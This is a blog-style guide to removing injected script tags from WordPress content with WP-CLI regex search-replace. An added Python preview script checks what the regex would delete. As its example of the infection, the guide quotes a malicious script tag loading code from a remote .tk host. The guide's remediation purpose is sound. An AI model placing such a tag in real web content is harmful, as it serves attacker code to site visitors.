This post will show how you can use the built-in search-replace function in WP-CLI with regex matching to batch remove harmful content from your WordPress site. This means that you can remove hundreds or thousands of injections in a matter of seconds instead of going through content and dumps manually.
Example of post_content injection:
...
Lorem ipsum dolor sit amet. <script src="https://nameserverdom.tk/assdhdfer" type="text/javascript"></script><script src="https://nameserverdom.tk/assdhdfer" type="text/javascript"> </script>Lorem ipsum dolor sit amet.
...
Go to https://regex101.com/ and figure out a good regex that fits your type of defacement.
For the defacement above, I settled on:
<script.*?tk.*?<\/script>
Now it’s time to run WP-CLI to remove the defacement.
It’s always good to test first with the --dry-run flag, which simulates a run but doesn’t actually do any replacements.
wp search-replace '<script.*?tk.*?<\/script>' '' --all-tables --dry-run --report-changed-only --precise --regex --regex-delimiter='/'
WP-CLI will tell you how many replacements are expected. When you feel like you’ve got a good result, remove --dry-run and you get the final command to run:
wp search-replace '<script.*?tk.*?<\/script>' '' --all-tables --report-changed-only --precise --regex --regex-delimiter='/'
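The dry run reports how many replacements would happen, not what text each one removes. The following pre-flight check is an added example, not part of the original post: it previews the removed fragments and flags any match that runs from one script tag into another, using Python's re module, which handles the lazy quantifiers and the newline-excluding dot in this pattern the same way as the PCRE engine behind --regex. The TIGHT pattern, the function name and the sample rows are assumptions made for illustration.

```python
import re

# The post's pattern, plus a tighter variant (an assumption, not the author's):
# it cannot leave a single tag and is pinned to the injected host.
BROAD = r'<script.*?tk.*?<\/script>'
TIGHT = (r'<script\b[^>]*\bsrc="https?://nameserverdom\.tk/[^"]*"'
         r'[^>]*>\s*</script>')

def preview(pattern, content):
    """Return (cleaned, removed, suspicious) for one field value.

    A removed fragment is suspicious when it holds more than one opening
    <script tag: the match began in one element and ended in another.
    """
    rx = re.compile(pattern)
    removed = [m.group(0) for m in rx.finditer(content)]
    suspicious = [frag for frag in removed if frag.count('<script') > 1]
    return rx.sub('', content), removed, suspicious

# Constructed sample rows. The injected tags are the ones shown in the post;
# the jQuery tag and paragraph stand in for legitimate content.
INJ = ('<script src="https://nameserverdom.tk/assdhdfer" '
       'type="text/javascript"></script>')
INJ_SPACED = INJ.replace('></script>', '> </script>')
LEGIT = '<script src="/wp-includes/js/jquery.js"></script><p>Keep me</p>'
SAMPLES = {
    'post_from_article': 'Lorem ipsum dolor sit amet. ' + INJ + INJ_SPACED
                         + 'Lorem ipsum dolor sit amet.',
    'legit_script_first': LEGIT + INJ + 'End.',
}

if __name__ == '__main__':
    for name, content in SAMPLES.items():
        for label, pattern in (('BROAD', BROAD), ('TIGHT', TIGHT)):
            cleaned, removed, suspicious = preview(pattern, content)
            print(f'{name} / {label}: {len(removed)} removal(s), '
                  f'{len(suspicious)} spanning more than one tag')
            print(f'  left behind: {cleaned!r}')
```

On the second sample the broad pattern starts at the legitimate script tag and deletes everything up to the injected tag's closing tag, so run the preview against a few exported field values before dropping --dry-run.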